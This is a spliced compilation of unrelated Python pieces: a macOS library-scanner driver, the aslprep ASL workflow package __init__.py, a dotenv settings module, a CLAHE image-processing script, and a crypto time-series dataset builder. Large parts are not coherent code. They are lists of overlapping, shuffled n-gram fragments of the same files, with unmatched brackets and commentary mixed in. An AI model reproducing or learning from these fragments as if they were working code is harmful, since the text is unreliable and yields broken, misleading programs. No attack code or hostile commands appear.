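A hypothetical driver for the scanner above, to show how the pieces compose: `scan_libraries_recursive` walks the whole dependency graph, and `filter_private` then strips the system-path entries from the report. This only runs on macOS with the Xcode command-line tools installed (it shells out to `otool`), and the command-line usage is an assumption, not part of the original module:

import sys

if __name__ == "__main__":
    # Usage sketch: python scan.py /path/to/binary
    scanned = scan_libraries_recursive(sys.argv[1], scan_private=True)
    for target, libs in sorted(filter_private(scanned).items()):
        print(target)
        for lib in sorted(libs):
            print("    " + lib)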
# --- Reassembled from the overlapping n-gram fragments of the third
# --- listing: aslprep/workflows/asl/__init__.py.
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Pre-processing ASL - ASL signal workflows
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

.. automodule:: aslprep.workflows.asl.base
.. automodule:: aslprep.workflows.asl.hmc
.. automodule:: aslprep.workflows.asl.stc
.. automodule:: aslprep.workflows.asl.t2s
.. automodule:: aslprep.workflows.asl.registration
.. automodule:: aslprep.workflows.asl.resampling
.. automodule:: aslprep.workflows.asl.confounds
.. automodule:: aslprep.workflows.asl.cbf

"""
from .base import init_asl_preproc_wf
from .gecbf import init_asl_gepreproc_wf
from .hmc import init_asl_hmc_wf
from .stc import init_asl_stc_wf
from .t2s import init_asl_t2s_wf
from .registration import (
    init_asl_t1_trans_wf,
    init_asl_reg_wf,
)
from .resampling import (
    init_asl_std_trans_wf,
    init_asl_surf_wf,
    init_asl_preproc_trans_wf,
)
from .confounds import (
    init_asl_confs_wf,
)
from .cbf import (
    init_cbf_compt_wf,
    init_cbfqc_compt_wf,
    init_cbfplot_wf,
    init_gecbfplot_wf,
    init_cbfroiquant_wf,
    init_gecbf_compt_wf,
    init_cbfgeqc_compt_wf,
)
from .ge_utils import (
    init_asl_geref_wf,
    init_asl_gereg_wf,
    init_asl_t1_getrans_wf,
    init_asl_gestd_trans_wf,
)

__all__ = [
    'init_asl_confs_wf',
    'init_gecbf_compt_wf',
    'init_asl_t1_getrans_wf',
    'init_asl_geref_wf',
    'init_asl_gereg_wf',
    'init_asl_gestd_trans_wf',
    'init_asl_hmc_wf',
    'init_asl_std_trans_wf',
    'init_asl_preproc_trans_wf',
    'init_asl_reg_wf',
    'init_asl_stc_wf',
    'init_asl_surf_wf',
    'init_asl_t1_trans_wf',
    'init_asl_t2s_wf',
    'init_asl_preproc_wf',
    'init_cbf_compt_wf',
    'init_cbfqc_compt_wf',
    'init_cbfplot_wf',
    'init_cbfroiquant_wf',
    'init_cbfgeqc_compt_wf',
]
"init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf',",
"[ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf',",
"( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf,",
"init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf",
"'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf',",
"- ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule::",
"from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf,",
"init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf',",
"-*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL -",
".hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration",
"4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\"",
"signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc ..",
"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s",
"ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc ..",
".gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s",
"from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from",
"'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf',",
"automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule::",
".. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration ..",
".confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf,",
"import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import",
"init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf',",
"aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import",
"ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc",
"import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf',",
"init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf',",
".resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf )",
"import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf,",
"ts=4 sw=4 et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule::",
"init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds",
"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set",
"indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing",
".. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling ..",
"init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ =",
"init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf)",
"automodule:: aslprep.workflows.asl.cbf \"\"\" from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc",
"init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import (",
") from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from",
"= [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf',",
"nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: \"\"\" Pre-processing ASL",
"'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf', 'init_cbfgeqc_compt_wf'",
"et: \"\"\" Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base ..",
"init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf import"
] |
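This `__init__.py` re-exports the workflow factory functions and pins the package's public surface with `__all__`. Note that `init_gecbfplot_wf` and `init_asl_gepreproc_wf` are imported above but absent from `__all__`, so they do not survive a star-import. A minimal sketch of how one might verify the export list at runtime, assuming aslprep is installed (the module path is taken from the automodule directives above):

# Consistency check for the package's public surface: every name in __all__
# should resolve on the module, and any "init_" factory that is importable
# but missing from __all__ is hidden from star-imports.
import importlib

asl = importlib.import_module("aslprep.workflows.asl")

missing = [name for name in asl.__all__ if not hasattr(asl, name)]
print("names in __all__ that do not resolve:", missing or "none")

unexported = [name for name in dir(asl)
              if name.startswith("init_") and name not in asl.__all__]
print("factories importable but hidden from star-imports:", unexported)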
# -*- coding: utf-8 -*-
from decouple import config
from dotenv import load_dotenv, find_dotenv

load_dotenv(find_dotenv('.env', usecwd=True))
load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True))

COUNTDOWN = config('COUNTDOWN', default=5, cast=int)
EVENT_INTERVAL = config('EVENT_INTERVAL', default=1, cast=int)
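The settings module above layers two dotenv files. Because python-dotenv does not overwrite variables that are already set (`override=False` by default), values from the `.env` loaded first take precedence and `default.env` only fills the gaps; `decouple.config` then applies its own defaults and casts. A self-contained sketch of that precedence, using temporary files in place of the project's real `.env`/`default.env`:

# Demonstrates the layered-defaults behaviour: the environment-specific file
# wins because load_dotenv() does not override variables already present.
import os
import tempfile
from dotenv import load_dotenv

for key in ("COUNTDOWN", "EVENT_INTERVAL"):
    os.environ.pop(key, None)  # start clean so the demo is deterministic

with tempfile.TemporaryDirectory() as tmp:
    env = os.path.join(tmp, ".env")
    default_env = os.path.join(tmp, "default.env")
    with open(env, "w") as f:
        f.write("COUNTDOWN=10\n")
    with open(default_env, "w") as f:
        f.write("COUNTDOWN=5\nEVENT_INTERVAL=1\n")

    load_dotenv(env)          # environment-specific values first
    load_dotenv(default_env)  # defaults only fill the gaps

    print(os.environ["COUNTDOWN"])       # 10 -> .env takes precedence
    print(os.environ["EVENT_INTERVAL"])  # 1  -> filled in from default.env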
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 21 14:21:03 2019

@author: tjb129
"""
import numpy as np
from PIL import Image
from skimage.exposure import equalize_adapthist
import os
from matplotlib import pyplot as plt

parent = '/data/Kaggle'
folders = ['pos-all-png',
           'test-png',
           'train-png',
           'neg-filt-png',
           'pos-filt-png']

for dir_i in folders:
    dir_i = os.path.join(parent, dir_i)
    save_dir = dir_i + '-clahe'
    if not os.path.exists(save_dir):
        os.mkdir(save_dir)
    for f in os.listdir(dir_i):
        fname = os.fsdecode(f)
        if fname.endswith(".png"):
            im = np.array(Image.open(os.path.join(dir_i, fname)))
            if len(im.shape) > 2:
                im = im[..., 0]         # keep a single channel of RGB(A) inputs
            im = im.astype(np.float64)  # np.float in the original is removed in NumPy >= 1.24
            # normalize to [0,1]
            im /= 255.
            im = equalize_adapthist(im)
            im = np.uint8(im * 255)
            im2 = Image.fromarray(im)
            im2.save(os.path.join(save_dir, fname))
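`equalize_adapthist` accepts a float image in [0, 1] and returns floats in the same range, which is why the script brackets the CLAHE call with `/ 255.` and `* 255`. A quick synthetic check of that round-trip (the gradient image here is invented purely for illustration):

# Verifies the dtype/range contract the batch script relies on.
import numpy as np
from skimage.exposure import equalize_adapthist

im = np.tile(np.linspace(0, 255, 64, dtype=np.uint8), (64, 1))  # fake 64x64 PNG
im = im.astype(np.float64) / 255.0   # normalize to [0, 1]
out = equalize_adapthist(im)         # CLAHE; returns float64 in [0, 1]
out8 = np.uint8(out * 255)           # back to 8-bit for saving

print(out.min(), out.max())    # stays within [0, 1]
print(out8.dtype, out8.shape)  # uint8 (64, 64)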
[
"length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length self.overlap",
"val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data",
"step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0",
"str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train",
"self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg)",
"= self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp)",
"self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen",
"self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error:",
"import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as",
"-> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data",
"time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if",
"if (self.x_Test is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"= None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test =",
"self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i >",
"np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples,",
"self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val",
"1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index) rows",
"= (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals = None",
"ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the sequence '",
"self.features_df = None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val",
"this list to load start_period = None -> Use from [0:] of historical",
"0 i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i,",
"start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls",
"- (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size ==",
"self.start_index = start_index + length self.overlap = overlap if end_index is None: end_index",
"= y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len",
"Use from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from",
"3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}'",
"self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index",
"timeframes). All data with chosen period loaded to memory Args: loader (DataLoad): object",
"end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse =",
"else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp",
"this pairs to load time_intervals = None -> Use all timeframes directories for",
"-> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes",
"None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen = None",
"= self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"- self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape",
"weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error:",
"overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle,",
"= f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1,",
"= self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\"",
"offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class",
"self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets =",
"= self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len +",
"return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self):",
"if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return",
"self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:,",
"directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this",
"split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows -",
") return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"chosen period loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator",
"sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence",
"targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets):",
"create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0]",
"Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory",
"sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad",
"start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets",
"object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape = None",
"DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All",
"def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class",
"if overlap > 0: start_index += overlap self.data = data self.targets = targets",
"= np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets",
"row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets",
"if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet:",
"self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test",
"data with chosen period loaded to memory Args: loader (DataLoad): object with data",
"val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data",
"* self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes)",
"Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\",",
"is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if",
"dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows *",
"DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600",
"self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\":",
"length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise",
"__version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else:",
"self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)",
"sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn",
"== 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else:",
"f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df",
"is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle",
"start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None ->",
"self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation",
"start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index,",
"None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)",
"x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len",
"== \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data,",
"np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle:",
"self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length self.overlap =",
"sequence ' 'would be left to be used as current step.' % (self.start_index,",
"if (self.x_Train is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train",
"df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len,",
":] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data",
"TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if",
"samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name:",
"= None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed,",
"\"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg =",
"= df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[",
"= self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif",
"df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows -",
"= None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler =",
"Class for dataset creation for dataset configuration we are using DSConstants dataclass (profile)",
"None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") ->",
"self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride,",
"not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and",
"df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len",
"typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing",
"= self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power()",
"self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data",
"1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size",
"y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
